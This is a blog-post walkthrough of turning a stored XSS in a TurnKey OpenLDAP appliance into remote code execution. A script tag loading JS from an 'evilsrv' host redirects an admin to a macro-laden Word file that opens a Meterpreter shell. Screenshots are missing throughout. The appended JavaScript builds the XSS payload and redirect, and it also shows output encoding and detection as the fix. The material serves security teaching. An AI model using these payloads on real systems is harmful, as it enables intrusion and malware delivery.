Thursday, 4 October 2018

OpenLDAP - from XSS to RCE

Today I was using the OpenLDAP VM from TurnKeyLinux (version 1.2.3, available here). After I found a small bug (a post-auth stored XSS) I was wondering how I could use it during my 'pentest'. Below you will find an example.

Here we go...

When you're ready:


We can log in as admin and go directly to the place vulnerable to the injection attack:


After reading this link you will be ready to create the PoC file and prepare Meterpreter:

Checking:


OK, the payload file is prepared. I moved the checkme2.docm file to /var/www/html (but you can use python -m SimpleHTTPServer as well). So we are here:


To deliver our MS Word file to the victim user I will use the very well known 'payload' to inject our JS code into OpenLDAP: a SCRIPT tag with a SRC attribute pointing at our server. But first, the bug. We can check whether our scenario is possible, for example here:


In the 'normal' case ;) we would see an alert() message box. This time we will serve checkme2.docm instead. Let's go to the new aliases / associated domains:


The code for the persistent XSS (a script tag whose src points to evilsrv/checkme.js) should be added here.

Now I switched to the VM with my Windows 7.

When you add our XSS example code you will see the traffic to the 'evil server' (left):


As you can see, we can save or open the file, so the payload (the 'redirect') works. If you want to go to the next stage of this example, you should use a 'vulnerable' browser ;D

Why? Because in its default configuration (in my case on Windows 7 Pro) IE will not download this file automatically. We need to change the browser's security settings (to make it more 'vulnerable' ;)):


Good enough for the educational purposes. ;]

I decided to save the file and then open it (from Explorer, c:\downloads\ and so on):

When I opened the file, there were a few more requests to my 'evil server':


Cool :) So we are here:


Checking the shell:


It's nothing sophisticated, but as you can see it can be used to raise awareness of XSS attacks and how to mitigate them (here: HTML-encoding attribute values before they are rendered in the admin UI, and a Content-Security-Policy that does not allow scripts to load from arbitrary hosts).
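An added example (not code from the original post or from the OpenLDAP appliance) showing the stored-XSS stage of this chain in JavaScript, for both the injection described above and the mitigation mentioned here: the injected attribute value, the body of the remote script that sends the browser to the .docm, a rendering function that reproduces the bug, and the output-encoded rendering that defeats it. The host name evilsrv and the file names checkme.js / checkme2.docm come from the post; the attribute name associatedDomain and the table-cell markup are assumptions for illustration only, not the application's real code.

```javascript
// Added example, not from the original post. Host and file names follow the
// post; attribute name and HTML layout are assumptions for illustration.
const EVIL_HOST = "evilsrv";          // attacker-controlled web server (from the post)
const REMOTE_JS = "checkme.js";       // script the victim's browser fetches (from the post)
const DOC_NAME = "checkme2.docm";     // macro-enabled Word file it redirects to (from the post)

// Body of the remote script served as checkme.js: once it executes in the
// admin's browser it redirects to the .docm, so the browser offers save/open.
function buildRedirectScript(host, doc) {
  return `window.location.href = "http://${host}/${doc}";`;
}

// Value stored in a free-text LDAP attribute (alias / associated domain).
// Nothing is executed at store time; it fires when the admin UI renders it.
function buildStoredPayload(host, js) {
  return `<script src="http://${host}/${js}"></script>`;
}

// Vulnerable rendering: the attribute value is concatenated straight into HTML.
function renderUnsafe(label, value) {
  return `<td>${label}</td><td>${value}</td>`;
}

// Mitigation: HTML-encode the significant characters before output.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Hardened rendering: same markup, encoded values.
function renderSafe(label, value) {
  return `<td>${escapeHtml(label)}</td><td>${escapeHtml(value)}</td>`;
}

// Checks a practitioner can run over rendered output: is there an executable
// <script> element, and which external hosts would the browser contact?
function containsScriptTag(html) {
  return /<script\b[^>]*>/i.test(html);
}

function externalScriptSources(html) {
  const re = /<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi;
  return Array.from(html.matchAll(re), (m) => m[1]);
}

// Demo: the same stored value rendered the vulnerable and the safe way.
const stored = buildStoredPayload(EVIL_HOST, REMOTE_JS);
console.log("unsafe:", renderUnsafe("associatedDomain", stored));
console.log("loads :", externalScriptSources(renderUnsafe("associatedDomain", stored)));
console.log("safe  :", renderSafe("associatedDomain", stored));
console.log("loads :", externalScriptSources(renderSafe("associatedDomain", stored)));
console.log("checkme.js body:", buildRedirectScript(EVIL_HOST, DOC_NAME));
```

The encoding has to happen at output time, in every place the attribute is displayed; rejecting angle brackets on input is a weaker second line because LDAP data can be written through other paths than the web UI. A Content-Security-Policy with a restrictive script-src would additionally stop the browser from fetching checkme.js from evilsrv even if encoding is missed somewhere.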

Maybe you will find it useful.

Cheers

